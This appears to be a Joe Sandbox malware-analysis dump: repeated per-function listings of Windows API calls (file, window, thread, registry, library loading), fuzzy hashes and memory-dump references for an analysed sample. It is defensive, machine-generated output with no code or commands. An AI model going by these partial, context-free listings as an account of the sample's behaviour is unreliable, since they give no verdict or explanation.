Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: b1f7b071676275b8bca714f611d39c5ae6601370eeda3395d93371a7988da540
Instruction ID: f7747360c2ad120fb25952daffd8fe5d06504635264f4202a32e637601739cc9
Opcode Fuzzy Hash: b1f7b071676275b8bca714f611d39c5ae6601370eeda3395d93371a7988da540
Instruction Fuzzy Hash: 4021BF35620118EFDB258FA4D859EFA3BF9FB89350F508169F90957261C33199A0DB60

Function 0024D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0027CB68), ref: 0024D2FB
GetLastError.KERNEL32 ref: 0024D30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 0024D319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0027CB68), ref: 0024D376

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 77399d0cdcd2381d19688757dc5d469c45d42475a8c6bbbc0efe3c71a10b5e54
Instruction ID: 9b155f56258634f69873ad9d51ec5aea7fe4cd6e02e9967a40f1a06c84e9089d
Opcode Fuzzy Hash: 77399d0cdcd2381d19688757dc5d469c45d42475a8c6bbbc0efe3c71a10b5e54
Instruction Fuzzy Hash: 1021BF705182029F8314DF38D88586EBBE4AF56324F204A9DF899C72A1D730DD56CF93

Function 00241571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00241014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0024102A
Part of subcall function 00241014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00241036
Part of subcall function 00241014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00241045
Part of subcall function 00241014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0024104C
Part of subcall function 00241014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00241062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 002415BE
_memcmp.LIBVCRUNTIME ref: 002415E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00241617
HeapFree.KERNEL32(00000000), ref: 0024161E

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 201d53d0fa539db93f47ddd1d218bc25280798cf865fe00913457c29d4f0f5fb
Instruction ID: 7fb285ccbff27c846c853e7fc8595e292a335c304efa1f0fcec7ea997860106d
Opcode Fuzzy Hash: 201d53d0fa539db93f47ddd1d218bc25280798cf865fe00913457c29d4f0f5fb
Instruction Fuzzy Hash: 1D21A171E10109EFDF08DFA4C949BEEB7B8EF44344F194459E445AB241D730EAA5CB90

Function 00272782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 0027280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00272824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00272832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00272840

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 47606a291624e60a1c9d0f9eab46ae7fa5b227651471da3444e454de48e0ba4e
Instruction ID: 71d361fcb6949f4ca40b50c062baded40caa659a90e662088e3b1dc4c8dee5f0
Opcode Fuzzy Hash: 47606a291624e60a1c9d0f9eab46ae7fa5b227651471da3444e454de48e0ba4e
Instruction Fuzzy Hash: 6021C431214511EFD7149F24D844F6ABB95EF45324F24815CF42A8B6D2C772FC96CB91

Function 002478F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00248D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0024790A,?,000000FF,?,00248754,00000000,?,0000001C,?,?), ref: 00248D8C
Part of subcall function 00248D7D: lstrcpyW.KERNEL32(00000000,?,?,0024790A,?,000000FF,?,00248754,00000000,?,0000001C,?,?,00000000), ref: 00248DB2
Part of subcall function 00248D7D: lstrcmpiW.KERNEL32(00000000,?,0024790A,?,000000FF,?,00248754,00000000,?,0000001C,?,?), ref: 00248DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00248754,00000000,?,0000001C,?,?,00000000), ref: 00247923
lstrcpyW.KERNEL32(00000000,?,?,00248754,00000000,?,0000001C,?,?,00000000), ref: 00247949
lstrcmpiW.KERNEL32(00000002,cdecl,?,00248754,00000000,?,0000001C,?,?,00000000), ref: 00247984

Strings

cdecl, xrefs: 0024797B

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 50826acd21d35d9137f8921ca782d628b44e6f03981adff45b8fd21beb216254
Instruction ID: 0225222e4c22d189a8b910a4ee64508c1a655dcbe655485394ba2303c02c5077
Opcode Fuzzy Hash: 50826acd21d35d9137f8921ca782d628b44e6f03981adff45b8fd21beb216254
Instruction Fuzzy Hash: 4111E63A210342ABCB199F38D849D7B77A9FF95350B50402EF94AC72A4EF719861C7A1

Function 00277CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00277D0B
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00277D2A
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00277D42
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0025B7AD,00000000), ref: 00277D6B

Part of subcall function 001F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001F9BB2

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: c818074d84524ade7d5202bfcb361da257bbd6a6d942d9540a418b75c9cd572e
Instruction ID: 7f1995c8062583a4bb3eb4bcc566b869e8de684572ed7df8f2ce12cc4ec401dc
Opcode Fuzzy Hash: c818074d84524ade7d5202bfcb361da257bbd6a6d942d9540a418b75c9cd572e
Instruction Fuzzy Hash: 2711A231524656AFCB209F68DC08AA63BA5AF45360B658728F83DD72F0D73199B0CB90

Function 00275660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 002756BB
_wcslen.LIBCMT ref: 002756CD
_wcslen.LIBCMT ref: 002756D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 00275816

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: 863314a291853bb11df4e4d339726ee41be71d65af4ef41f1867b5359a115075
Instruction ID: e98f89db0aaf5a23700c8fae33596e65172978ae70801a73e69f0a98c0b14a2f
Opcode Fuzzy Hash: 863314a291853bb11df4e4d339726ee41be71d65af4ef41f1867b5359a115075
Instruction Fuzzy Hash: 9D11D671A2062996DB209F61DC85AEEB76CFF11760F50C02AFA1DD6081E7F0D9A4CF60

Function 00211D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 852364c4443ea38f5a7b53a78bb82d828e66a127f28c5a4cbaf25d3e41b6e066
Instruction ID: 88905e31034c9227e020a6c91c913ce3df05517ec8aa85de2d5a79751af55279
Opcode Fuzzy Hash: 852364c4443ea38f5a7b53a78bb82d828e66a127f28c5a4cbaf25d3e41b6e066
Instruction Fuzzy Hash: E201A2B222961B7EF7112A787CC5FA7669CDF617B8B300329F625511D2DB708CB08570

Function 00241A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00241A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00241A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00241A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00241A8A

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 536537075adeba94301104a3373fdff578011f1c25b28de84cc7d18b54d8a844
Instruction ID: 56900116b5cc66aed54fb0cabde2562ad2707fed74a97057d40b98c24d711274
Opcode Fuzzy Hash: 536537075adeba94301104a3373fdff578011f1c25b28de84cc7d18b54d8a844
Instruction Fuzzy Hash: 08117C3AD01229FFEB10DBA4CD84FADBB78EB04350F200091E600B7290C6716E60DB94

Function 0024E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0024E1FD
MessageBoxW.USER32(?,?,?,?), ref: 0024E230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0024E246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0024E24D

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 1068ea52b5198ace467a7ef81735ee670e9a79e7919a563717aa5f4d19de9c49
Instruction ID: 200a4bade8adaedac63aae42ea7c030fdf3c77943b561df095d088ec87f5bb1f
Opcode Fuzzy Hash: 1068ea52b5198ace467a7ef81735ee670e9a79e7919a563717aa5f4d19de9c49
Instruction Fuzzy Hash: 3B11E172914214ABDB05DFB8AC09AAA7BACAB45320F514369FD29E3291D6B08D1087A0

Function 0020D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,0020CFF9,00000000,00000004,00000000), ref: 0020D218
GetLastError.KERNEL32 ref: 0020D224
__dosmaperr.LIBCMT ref: 0020D22B
ResumeThread.KERNEL32(00000000), ref: 0020D249

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: f6c82ab4c7ee7a90cd84684985e2752006229163ec60b07dba125164d8ad96a8
Instruction ID: f248f761cc44c85efa7e65e7ede7c675f879981fbc0c617e5b8617b44f8eebcd
Opcode Fuzzy Hash: f6c82ab4c7ee7a90cd84684985e2752006229163ec60b07dba125164d8ad96a8
Instruction Fuzzy Hash: F901C436426305BFD7216FF5DC09BAA7A69DF81730F200219FD29961D2CF7089618AA0

Function 001E600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001E604C
GetStockObject.GDI32(00000011), ref: 001E6060
SendMessageW.USER32(00000000,00000030,00000000), ref: 001E606A

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 44ffbdcd7288078bea5d4c8b23aa535f70cb4bb220996971203e877613b132e2
Instruction ID: 831651233c0b1fd7833c3aa1efca1dc1e2cd5d1bc1e6e6aa1a5e064c399737f7
Opcode Fuzzy Hash: 44ffbdcd7288078bea5d4c8b23aa535f70cb4bb220996971203e877613b132e2
Instruction Fuzzy Hash: B011A172101958BFEF165FA59C48EEEBB6DEF183A4F500215FA0452010C736ACA0DB90

Function 00203B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00203B56

Part of subcall function 00203AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00203AD2
Part of subcall function 00203AA3: ___AdjustPointer.LIBCMT ref: 00203AED

_UnwindNestedFrames.LIBCMT ref: 00203B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00203B7C
CallCatchBlock.LIBVCRUNTIME ref: 00203BA4

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: 2afed227d9d5d13f55b9eb5217e466f522ad7100fb394624e59c67db20acdbf0
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: 13012972110249BBDF12AE95CC42EEB3B6EEF88758F048414FE4856162C732E971DFA0

Function 00213073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00250832,00000000,00000000,?,0021301A,00250832,00000000,00000000,00000000,?,0021328B,00000006,FlsSetValue), ref: 002130A5
GetLastError.KERNEL32(?,0021301A,00250832,00000000,00000000,00000000,?,0021328B,00000006,FlsSetValue,00282290,FlsSetValue,00000000,00000364,?,00212E46), ref: 002130B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0021301A,00250832,00000000,00000000,00000000,?,0021328B,00000006,FlsSetValue,00282290,FlsSetValue,00000000), ref: 002130BF

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 28f82d8de8c11702d489765979e9964114370c85fb4e05776e2ffc7d390aec48
Instruction ID: a3c998a2bfa7176f8fb1ad8b139f6a00000438a30609060063e3ccd99b1d414a
Opcode Fuzzy Hash: 28f82d8de8c11702d489765979e9964114370c85fb4e05776e2ffc7d390aec48
Instruction Fuzzy Hash: 0901D832331623ABC7218E79AC489977BD99F59761B210634F909E3140DB21D991C7E0

Function 00247464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0024747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00247497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 002474AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 002474CA

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 3b1beaea7a128dc51b6c3d52e1912a0e33eb89dde6a64422d73f94a21f6f12b0
Instruction ID: c53c4e21ceb3c25d67f70deb2c3c71203dc9e02b362ed981fd8f37730d15a688
Opcode Fuzzy Hash: 3b1beaea7a128dc51b6c3d52e1912a0e33eb89dde6a64422d73f94a21f6f12b0
Instruction Fuzzy Hash: 0411A1B52153119BF7208F24EC0CBA37BFCEB00B00F10856DA62AD6151D7B0E954DBA0

Function 0024B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0024ACD3,?,00008000), ref: 0024B0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0024ACD3,?,00008000), ref: 0024B0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0024ACD3,?,00008000), ref: 0024B0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0024ACD3,?,00008000), ref: 0024B126

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: ebacbda30854af48f78ec15881ba3df809babe539ed432f7b18b6300cc164f9b
Instruction ID: bb5a5a2c7e28396b33a94c6e6b3ea6f150d98914607327a8d010f481e3baab61
Opcode Fuzzy Hash: ebacbda30854af48f78ec15881ba3df809babe539ed432f7b18b6300cc164f9b
Instruction Fuzzy Hash: FF116D31C2152DE7CF09AFE4E9586EEBB78FF09711F104099D949B6181CB709660CB51

Function 00242DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00242DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 00242DD6
GetCurrentThreadId.KERNEL32 ref: 00242DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00242DE4

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: dca97081fb6a77865ddf732d84b4b4af608b596ff3b973345b075200331bf12c
Instruction ID: a0ae8596ab72ea48bb597b62ec9b4b6f4897f5a6aa3ac47b181427d7928ad1b4
Opcode Fuzzy Hash: dca97081fb6a77865ddf732d84b4b4af608b596ff3b973345b075200331bf12c
Instruction Fuzzy Hash: 34E06D71511225FAD7242B73AC4EEEB7E6CEB83BA1F900029F109D10809AA48884C6B0

Function 00278863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 001F9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 001F9693
Part of subcall function 001F9639: SelectObject.GDI32(?,00000000), ref: 001F96A2
Part of subcall function 001F9639: BeginPath.GDI32(?), ref: 001F96B9
Part of subcall function 001F9639: SelectObject.GDI32(?,00000000), ref: 001F96E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00278887
LineTo.GDI32(?,?,?), ref: 00278894
EndPath.GDI32(?), ref: 002788A4
StrokePath.GDI32(?), ref: 002788B2

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

